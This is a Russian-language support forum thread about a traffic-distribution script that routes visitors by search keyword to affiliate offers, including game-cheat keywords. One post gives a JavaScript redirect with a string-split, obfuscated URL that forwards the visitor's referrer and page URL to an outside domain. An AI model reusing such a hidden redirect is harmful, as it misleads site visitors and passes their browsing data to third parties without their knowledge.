www.kytoon.com

Форум поддержки скриптов www.kytoon.com
Текущее время: Ср ноя 14, 2018 9:52 pm

Часовой пояс: UTC




Начать новую тему Ответить на тему  [ Сообщений: 6 ] 
Автор Сообщение
 Заголовок сообщения: Фильтр по словам проблема
СообщениеДобавлено: Чт авг 25, 2011 8:18 am 
Не в сети

Зарегистрирован: Чт авг 25, 2011 8:10 am
Сообщения: 2
Имеем 2 схемы:
1. Изображение

2. Изображение

При передаче http://site.com/in.cgi?2&parameter=скачать читы танки онлайн

все срабатывает нормально и перекидывает на нужную партнерку с нужным кеем,

если же задать http://site.com/in.cgi?2&parameter=видео танки онлайн
то выдает

Object not found!

The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again

Error 404

Что не так сделал?


Вернуться к началу
 Профиль  
Ответить с цитатой  
 Заголовок сообщения: Re: Фильтр по словам проблема
СообщениеДобавлено: Чт авг 25, 2011 8:51 am 
Не в сети

Зарегистрирован: Чт авг 25, 2011 8:10 am
Сообщения: 2
Разобрался в чем было дело, надо было просто почистить кэш браузера.


Вернуться к началу
 Профиль  
Ответить с цитатой  
 Заголовок сообщения: Re: Фильтр по словам проблема
СообщениеДобавлено: Пт сен 16, 2011 10:59 am 
Не в сети

Зарегистрирован: Пт сен 16, 2011 10:51 am
Сообщения: 1
передаю так
/in.cgi?2&parameter=кей+кей2+кей3


в схеме parameter /кей|кей2|кей3/

на урлы по параметру не разбрасывает, кидает на дефолтный адрес.
в чем проблема хз


Вернуться к началу
 Профиль  
Ответить с цитатой  
 Заголовок сообщения: Re: Фильтр по словам проблема
СообщениеДобавлено: Сб сен 17, 2011 9:27 am 
Не в сети
Site Admin

Зарегистрирован: Вс май 01, 2005 3:20 pm
Сообщения: 1132
скорее всего из-за какого-то другого фильтра


Вернуться к началу
 Профиль  
Ответить с цитатой  
 Заголовок сообщения: Re: Фильтр по словам проблема
СообщениеДобавлено: Вс фев 19, 2012 8:57 am 
Не в сети

Зарегистрирован: Пн май 23, 2011 1:30 pm
Сообщения: 3
А такая конструкция будет работать?

Код:
window.location=("http://ww"+"w.domen.in/in"+".cgi?2&seo"+"ref="+encodeURIComponent(document.referrer)+ "&par"+"ameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=key");


Вернуться к началу
 Профиль  
Ответить с цитатой  
 Заголовок сообщения: Re: Фильтр по словам проблема
СообщениеДобавлено: Пн фев 20, 2012 6:59 pm 
Не в сети
Site Admin

Зарегистрирован: Вс май 01, 2005 3:20 pm
Сообщения: 1132
наверное да


Вернуться к началу
 Профиль  
Ответить с цитатой  
Показать сообщения за:  Поле сортировки  
Начать новую тему Ответить на тему  [ Сообщений: 6 ] 

Часовой пояс: UTC


Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 1


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете добавлять вложения

Найти:
Перейти:  
cron